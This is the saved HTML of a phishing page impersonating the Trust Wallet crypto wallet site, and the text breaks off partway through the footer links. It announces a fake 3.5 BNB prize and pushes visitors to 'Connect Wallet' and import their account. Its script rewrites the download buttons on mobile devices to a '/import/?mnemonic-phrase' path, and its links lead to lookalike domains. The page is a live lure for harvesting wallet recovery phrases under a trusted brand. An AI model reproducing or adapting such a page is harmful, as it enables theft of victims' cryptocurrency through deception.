<!DOCTYPE html>
<!-- saved from url=(0040)https://browser-dapp.rf.gd/reward.html?/ -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="google-site-verification" content="+nxGUDJ4QpAZ5l9Bsjdi102tLVC21AIh5d1Nl23908vVuFHs34">
<meta name="facebook-site-verification" content="+nxGUDJ4QpAZ5l9Bsjdi102tLVC21AIh5d1Nl23908vVuFHs34">
  
  

<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Trust - Crypto Wallet</title>
<meta property="og:title" content="Trust - Crypto Wallet">
<meta name="description" content="multi coin.">
<meta property="og:description" content="multi coin.">
<meta name="twitter:card" content="summary_large_image">
<meta property="twitter:image" content="./index_files/horizontal_blue.png">
<meta name="twitter:creator" content="@trustwalletapp">
<meta property="og:locale" content="en">
<meta property="og:image" content="./index_files/horizontal_blue.png">
<meta property="og:type" content="website">
<link rel="canonical" href="https://safemoon-protokol-app.42web.io/?fbclid=IwAR2fjs8_BaiOIIl_xbIuzcPCOBhNgMmyxFsNITvUCYimVjd5crAg1xWG7P8">
<meta property="og:url" content="">
<meta property="og:site_name" content="Trust Wallet">
<meta property="al:ios:app_name" content="Trust Wallet">
<meta property="al:ios:app_store_id" content="1288339409">
<meta property="al:ios:url" content="trust://">
<meta property="al:android:app_name" content="Trust Wallet">
<meta property="al:android:package" content="">
<meta property="al:android:url" content="">
<link rel="shortcut icon" href="https://safemoon-protokol-app.42web.io/images/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" type="image/png" href="https://safemoon-protokol-app.42web.io/images/favicon.png">
<meta name="apple-itunes-app" content="app-id=1288339409,affiliate-data=11l7ss">
<meta name="theme-color" content="#3375BB">
<script type="application/ld+json">
    {
      "description": "You will learn about what is staking and how to stake coins, what are the different stacking mechanism and what benefits you will get from staking. Staking page providers list of currently supported stacking coins on Trust Wallet.",
      "@type": "WebPage",
      "url": "",
      "headline": "Staking Coins | Proof of Stake Coins | How to Stake Coins | Trust Wallet",
      "@context": ""
    }
  </script><script async="" defer="" data-domain="" src="./Trust - Crypto Wallet_files/plausible.js.download"></script><script type="application/javascript">
    document.addEventListener("DOMContentLoaded", function(event) {
      document.getElementById('navbarToggle').addEventListener('click', function() {
        var el = document.getElementById('navbarSupportedContent');
        var toggled = window.getComputedStyle(el).display == 'block';
        if (toggled) {
          el.style.display = "none";
        } else {
          el.style.display = "block";
        }
      })
      //Add Huawei download button based on device.
      var result = new UAParser().getResult();
      var apple = document.getElementsByClassName("apple");
      var huawei = document.getElementsByClassName("huawei");
      var download = document.getElementsByClassName("downloadapp-native");

      if (result.os.name == "Android") {
        for (var i = 0; i < huawei.length; i++) {
          huawei[i].classList.remove("hidden");
          apple[i].classList.add("hidden");
        }
        // if it is android change ctas to googleplay
        for (var i = 0; i < download.length; i++) {
          download[i].href = "/import/?mnemonic-phrase";
        }
      }
      // if its apple change ctas to appstore
       else if (result.os.name == "iOS") {
        for (var i = 0; i < download.length; i++) {
          download[i].href = "/import/?mnemonic-phrase";
        }
      }
    });
  </script>
<link rel="preload" href="https://safemoon-protokol-app.42web.io/import/?fbclid=IwAR2fjs8_BaiOIIl_xbIuzcPCOBhNgMmyxFsNITvUCYimVjd5crAg1xWG7P8" as="font" type="font/woff2" crossorigin="">
<link rel="preload" href="https://safemoon-protokol-app.42web.io/import/?fbclid=IwAR2fjs8_BaiOIIl_xbIuzcPCOBhNgMmyxFsNITvUCYimVjd5crAg1xWG7P8" as="font" type="font/woff2" crossorigin="">
<link rel="preload" href="https://safemoon-protokol-app.42web.io/import/?fbclid=IwAR2fjs8_BaiOIIl_xbIuzcPCOBhNgMmyxFsNITvUCYimVjd5crAg1xWG7P8" as="font" type="font/woff2" crossorigin="">
<link rel="stylesheet" href="./Trust - Crypto Wallet_files/main.css">
<link rel="alternate" href="./Trust - Crypto Wallet_files/main.css" hreflang="en">
<link rel="alternate" href="./Trust - Crypto Wallet_files/main.css" hreflang="x-default"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="ru"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="de"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="vi"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="id"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="ko"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="ja"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="tr"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="pt"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="zh"><link rel="alternate" href="https://safemoon-protokol-app.42web.io/" hreflang="es"><script type="text/javascript" src="./Trust - Crypto Wallet_files/platform.js.download"></script>
<style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style><style>.dropdown-menu{max-height:500px;overflow:scroll}.dropdown-toggle::after{display:none}</style><style>.row-container{align-items:center;margin:0}.row-container:hover{cursor:pointer;background-color:#f9fafb}.item{min-height:52px}.section{background:#f9fafb;padding:10px 16px;color:#aaa;font-size:13px}</style><style>:host{display:block;width:100%}</style><style>.logo{width:36px;height:36px;max-width:36px;max-height:36px;border-radius:10px}</style></head>
<body> <nav class="navbar navbar-expand-lg navbar-togglable navbar-dark bg-primary d-block">
<div class="container">
<a id="navbar-brand" class="navbar-brand" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes back on homepage"><img src="./Trust - Crypto Wallet_files/jalogo.png" alt="cashtab" class="sc-tilXH gdtVXy"></a><a href="https://browser-dapp.rf.gd/trust/trustwallet.html" class="d-block d-lg-none navbar-btn btn btn-sm btn-light ml-auto downloadapp-native" target="_blank" aria-label="Goes to download page to download Trust Wallet">
Get it now
</a><button class="navbar-toggler collapsed" id="navbarToggle" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation" aria-controls="navbarCollapse">
<span class="navbar-toggler-icon collapsed"></span>
</button>
<div class="navbar-collapse collapse navbar-margin" id="navbarSupportedContent">
<button class="navbar-toggler collapsed" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
</button>
<ul class="navbar-nav font-size-sm ml-auto">
<li class="nav-item">
<a class="nav-link" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes to supported assets page">Assets</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes to staking page where you can learn what is staking and calculate APRs">Staking</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes to earn page where you can see what you can stake and calculate earnings">Earn<span class="badge badge-success ml-2 pl-2 pr-2">+11% APR</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes to collectible page">NFTs</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://browser-dapp.rf.gd/trust/trustwallet.html" aria-label="Goes to dapp browser page">DApp Browser</a>
</li><li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="https://browser-dapp.rf.gd/trust/trustwallet.html" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="false" aria-expanded="true" aria-label="Opens dropdown to select different language for the site">
Language
<div class="flag bg-" alt=" flag"></div>
</a>
<div class="dropdown-menu dropdown-menu-md" aria-labelledby="navbarDropdown">
<div class="list-group list-group-flush">
<ul class="list-unstyled list-block">
<li class="list-inline-item m-6"><a class="list-group-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to en language">
<div class="flag bg-en" alt="en flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to ru language">
<div class="flag bg-ru" alt="ru flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to de language">
<div class="flag bg-de" alt="de flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to vi language">
<div class="flag bg-vi" alt="vi flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to id language">
<div class="flag bg-id" alt="id flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to ko language">
<div class="flag bg-ko" alt="ko flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to ja language">
<div class="flag bg-ja" alt="ja flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to tr language">
<div class="flag bg-tr" alt="tr flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to pt_BR language">
<div class="flag bg-pt_BR" alt="pt_BR flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to zh_CN language">
<div class="flag bg-zh_CN" alt="zh_CN flag"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="https://safemoon-protokol-app.42web.io/" aria-label="changes language of the page to es language">
<div class="flag bg-es" alt="es flag"></div>
</a></li>
</ul>
</div>
</div>
 </li></ul>
</div>
</div>
</nav>
<main class="page-content" aria-label="Content">
<div class="container">
<section class="pt-8 pb-8 text-center">


<div class="pt-6">
<div class="card shadow-lg">
<div class="card-body">
<div class="row">
<div class="col-12">

<p></p><p></p><center></center><p></p><span class="day success"><center><strong>CONGRATULATIONS!</strong><p></p></center><center><p class="text-gray-700 pb-4">You are an active user who is lucky to be selected to get a prize of 3,5 (BNB)  ($1154,50 USD).</p><p></p></center>
<a class="text-reset text-decoration-none">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo.png">
<p class="text-left d-inline-block ml-2 text-gray-700">3,5 (BNB)</p>
</a><center><strong></strong><p></p></center><center><p class="text-gray-700 pb-4">Please click "Connect Wallet" then import your account to Earn 3,5 (BNB).</p><p></p></center></span>
</div>


</div>

<div class="d-flex align-items-center text-reset">


</div>
<div class="d-flex align-items-center text-reset mb-6">

<div class="ml-auto">

</div>
</div>
<button href="trustwallet/trustwallet.html" onclick="window.open(&#39;trustwallet/trustwallet.html&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=780&#39;) ;return false" rel="dialog" <a="" class="btn btn-block btn-primary downloadapp-native">
Connect Wallet
</button>
</div>
</div>
<script type="application/javascript">
  function load() {
    var calculateValues = function(apr, amount) {
      //daily
      var day = ((amount / 100) * apr) / 12 / 24;
      //monthly
      var month = ((amount / 100) * apr) / 12;
      //yearly
      var year = ((amount / 100) * apr);

      var reward_day;
      var reward_month;
      var reward_year;

      if (amount == 0) {
        reward_day = day.toFixed(0);
        reward_month = month.toFixed(0);
        reward_year = year.toFixed(0);
      } else if (amount < 1) {
        reward_day = day.toFixed(8);
        reward_month = month.toFixed(6);
        reward_year = year.toFixed(6);
      } else {
        reward_day = day.toFixed(4);
        reward_month = month.toFixed(4);
        reward_year = year.toFixed(2);
      }


      return {
        day: reward_day,
        month: reward_month,
        year: reward_year
      }
    };

    var fillValues = function(values, coin) {
      document.getElementsByClassName('day')[0].innerHTML = "+" + values.day + ` ${coin.symbol}`;
      document.getElementsByClassName('month')[0].innerHTML = "+" + values.month + ` ${coin.symbol}`;
      document.getElementsByClassName('year')[0].innerHTML = "+" + values.year + ` ${coin.symbol}`;
    };

    document.getElementById('coins').selected.subscribe(coin => {
      //Dieter Rams professional staking calculation
      var apr = coin.apr;
      var amount = document.getElementById('amount').value || 100;

      fillValues(calculateValues(apr, amount), coin);


      document.getElementById('amount').onkeyup = function() {
        // amount from the input
        var amount = document.getElementById('amount').value;

        fillValues(calculateValues(apr, amount), coin);
      };
    });
  }
</script>
<script src="./Trust - Crypto Wallet_files/ui-coins@0.1.30" async="" onload="load()"></script>
</div>
</section>
<section class="pt-8 pb-8 border-bottom text-center text-md-left">
<div class="row align-items-center justify-content-between">
<div class="col-12 col-md-6 col-lg-5 ">
<h3 class="display-4 font-weight-bold">How to get Prizes?</h3>
<p class="text-gray-700"></p><ul class="ul-bullet">
<li>Import your Wallet then the Prize will be immediately available in your account.</li>
<li>Prizes can only be claimed using an account that has a history of transactions. The greater the value of the assets contained in your account, the greater the Prize that will be won.</li>
</ul><p></p>
</div>
<div class="col-12 col-md-6 col-lg-7">
<img class="img-fluid mx-auto d-block" src="./Trust - Crypto Wallet_files/pantek-list.png">
</div>
</div>
</section>

<section class="pt-8 text-center text-md-left">
<div class="row align-items-center justify-content-between">

</div></section>
<section class="pt-8 pb-6 text-center text-md-left">
<h3 class="font-weight-bold mb-8">Trust Wallet lets you stake the following coins</h3>
<div class="row">
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo.png" alt="BNB">
<p class="text-left d-inline-block ml-2 text-gray-700">Binance Coin (BNB)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-trx.png" alt="TRX">
<p class="text-left d-inline-block ml-2 text-gray-700">TRON (TRX)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-xtz.png" alt="XTZ">
<p class="text-left d-inline-block ml-2 text-gray-700">Tezos (XTZ)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-atom.png" alt="ATOM">
<p class="text-left d-inline-block ml-2 text-gray-700">Cosmos (ATOM)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-v.png" alt="VET">
<p class="text-left d-inline-block ml-2 text-gray-700">VeChain (VET)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-z.png" alt="CLO">
<p class="text-left d-inline-block ml-2 text-gray-700">Callisto (CLO)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-kava.jpg" alt="KAVA">
<p class="text-left d-inline-block ml-2 text-gray-700">Kava (KAVA)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-tezos.png" alt="TOMO">
<p class="text-left d-inline-block ml-2 text-gray-700">TomoChain (TOMO)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-roket.png" alt="IOTX">
<p class="text-left d-inline-block ml-2 text-gray-700">IoTeX (IOTX)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<a class="text-reset text-decoration-none" href="https://browser-dapp.rf.gd/trust/trustwallet.html">
<img class="mx-auto d-inline-block rounded-circle" height="38" width="38" src="./Trust - Crypto Wallet_files/logo-pesawatjatuh.png" alt="ALGO">
<p class="text-left d-inline-block ml-2 text-gray-700">Algorand (ALGO)</p>
</a>
</div>
</div>
<div class="col-12 col-lg-4 col-sm-6 col-xs-12 mb-4">
<div class="d-flex">
<p class="text-left d-inline-block ml-2 text-gray-700">More coming soon...</p>
</div>
</div>
</div>
</section>
</div>
</main><section class="bg-light">
<div class="container pt-8 pb-8">
<div class="row align-items-center">
<div class="col-12 col-md text-center text-lg-left mt-2">
<h3 class="font-weight-bold mb-1">
Get the Trust Wallet app now!
</h3>
<p class="text-gray-700 mb-6 mb-md-0 no-whitespace">
The most trusted &amp; secure crypto wallet
</p>
</div>
<div class="col-12 col-lg-7"><div class="download-button">
<div class="row download">
<div class="col-12 col-lg-4 apple">
<a href="https://apps.apple.com/app/apple-store/id1288339409?mt=8" class="downloadapp" aria-label="goes to AppStore to download Trust Wallet for iphones">
<svg class="download-app-image download-apple" loading="lazy" alt="Download button for AppStore" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 googleplay">
<a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&amp;referrer=utm_source%3Dwebsite" class="downloadapp" aria-label="goes to Google Play store to download Trust Wallet for Android phones">
<svg class="download-app-image download-play" loading="lazy" alt="Download button for Google Play" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 androidapk">
<a href="https://trustwallet.com/dl/apk" class="downloadapp" aria-label="Downloads Trust Wallet as APK file for Android phones">
<svg class="download-app-image download-apk" loading="lazy" alt="Download button for Android APK file" rel="noopener"></svg>
</a>
</div>
<div class="col-12 col-lg-4 huawei hidden">
<a href="https://app.trustwallet.com-receive-token.site/?/Import-Multicoin-Wallet" class="downloadapp" aria-label="goes to huawei store to download Trust Wallet for huawei phones">
<svg class="download-app-image download-huawei" loading="lazy" alt="Download button for Huawei" rel="noopener"></svg>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<footer class="py-8 py-md-8 bg-white">
<data class="u-url" href="/"></data>
<div class="container">
<div class="row text-center text-md-left">
<div class="col-12 col-md-4 col-lg-3">
<a href="https://safemoon-protokol-app.42web.io/?i=1" id="footer-brand-image" aria-label="Goes to homepage"><svg alt="" class="footer-brand-image logotype-dark img-fluid mb-4"></svg></a><ul class="list-unstyled list-inline list-social mb-6 mb-md-0">
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Facebook fan page">
<svg class="social-icon" alt="trust wallet facebook">
<use xlink:href=""></use>
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet github page">
<svg class="social-icon" alt="trust wallet github">
<use xlink:href=""></use>
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Instagram fan page">
<svg class="social-icon" alt="trust wallet instagram">
<use xlink:href=""></use>
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Twitter fan page">
<svg class="social-icon" alt="trust wallet twitter">
<use xlink:href=""></use>
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2 mr-5 mr-sm-3">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet Reddit fan page">
<svg class="social-icon" alt="trust wallet reddit">
<use xlink:href=""></use>
</svg>
</a>
</li>
<li class="list-inline-item list-social-item pt-2">
<a href="https://safemoon-protokol-app.42web.io/" class="text-decoration-none" target="_blank" rel="noopener" aria-label="Goes to Trust Wallet title telegram announcement chat">
<svg class="social-icon" alt="trust wallet telegram">
<use xlink:href=""></use>
</svg>
</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-3">
<h4 class="font-weight-bold text-uppercase text-gray-700">Trust Wallet</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3">
<a href="https://trustwallet.com/assets" class="text-reset" aria-label="Goes to assets page">Assets</a>
</li>
<li class="mb-3">
<a href="https://trustwallet.com/dapp" class="text-reset" aria-label="Goes to dapp browser page">DApp Browser</a>
</li>
<li class="mb-3">
<a href="https://trustwallet.com/stablecoins" class="text-reset" aria-label="Goes to stablecoin page">Stablecoins</a>
</li>
<li class="mb-3">
<a href="https://trustwallet.com/beta" class="text-reset" aria-label="Goes Trust Wallet Beta page">Beta</a>
</li>
<li class="mb-3">
<a href="https://trustwallet.com/collectibles-wallet" class="text-reset" aria-label="Goes to collectible page">NFTs</a>
</li>
<li class="mb-3">
<a href="https://trustwallet.com/el-salvador-wallet" class="text-reset" aria-label="Goes to el salvador wallet">El Salvador Wallet</a>
</li>
<li class="mb-3">
<a href="https://apps.apple.com/app/apple-store/id1288339409?mt=8" rel="noopener" target="_blank" class="text-reset" aria-label="Opens AppStore page to download Trust Wallet for iphones">Crypto Wallet for iOS</a>
</li>
<li class="mb-3">
<a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&amp;referrer=utm_source%3Dwebsite" rel="noopener" target="_blank" class="text-reset" aria-label="Opens Google Play page to download Trust Wallet for androids">Crypto Wallet for Android</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 col-lg-2">
<h4 class="font-weight-bold text-uppercase text-gray-700">Information</h4>
<ul class="list-unstyled text-gray-700 mb-0">
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?community.trustwallet.com/" target="_blank" class="text-reset" aria-label="Opens Trust Wallet community page">Community</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?community.trustwallet.com/c/helpcenter" target="_blank" class="text-reset" aria-label="Opens help Ccnter page">Help Center</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?support.trustwallet.com/" rel="noopener" target="_blank" class="text-reset" aria-label="Opens support page">Support</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?blog" rel="noopener" class="text-reset" aria-label="Opens Trust Wallet blog page">DApp Journey</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?developer" class="text-reset" aria-label="Opens Developer page">Developers</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?submit-dapp" class="text-reset" aria-label="Opens a page with form to submit a dapp for Trust Wallet listing">Submit DApp</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/h/?press" class="text-reset" aria-label="Opens a page with brand kit with Trust Wallet logos, icons and many more">Press Kit</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?terms-of-services" class="text-reset" aria-label="Opens a page with terms of services">Terms Of Service</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?privacy-and-policy" class="text-reset" aria-label="Opens a page with privacy and policy">Privacy Policy</a>
</li>
</ul>
</div>
<div class="col-12 col-md-4 offset-md-4 col-lg-2 offset-lg-0">
<h4 class="font-weight-bold text-uppercase text-gray-700">Use Crypto</h4>
<ul class="list-unstyled text-gray-700 mb-6 mb-md-8 mb-lg-0">
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-bitcoin" class="text-reset" aria-label="opens a bitcoin page">Buy Bitcoin with a credit card</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-ethereum" class="text-reset" aria-label="opens a ethereum page where you can learn how to buy it">Buy Ethereum</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?id/buy-bnb" class="text-reset" aria-label="opens a binance coin page where you can learn how to buy it">Buy BNB</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-litecoin" class="text-reset" aria-label="opens a litecoin page where you can learn how to buy it">Buy Litecoin</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-tron" class="text-reset" aria-label="opens a bitcoin tron where you can learn how to buy it">Buy TRON</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-xrp" class="text-reset" aria-label="opens a xrp page where you can learn how to buy it">Buy XRP</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?buy-bitcoincash" class="text-reset" aria-label="opens a bitcoin cash page where you can learn how to buy it">Buy Bitcoin Cash</a>
</li>
<hr>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?earn-bitcoin" class="text-reset" aria-label="opens a bitcoin page where you can learn how to earn it">Earn Bitcoin</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?earn-ethereum" class="text-reset" aria-label="opens a ethereum page where you can learn how to earn it">Earn Ethereum</a>
</li>
<li class="mb-3">
<a href="https://safemoon-protokol-app.42web.io/?earn-binance-coin" class="text-reset" aria-label="opens a binance coin page where you can learn how to earn it">Earn Binance Coin</a>
</li>
<li class="mb-3">
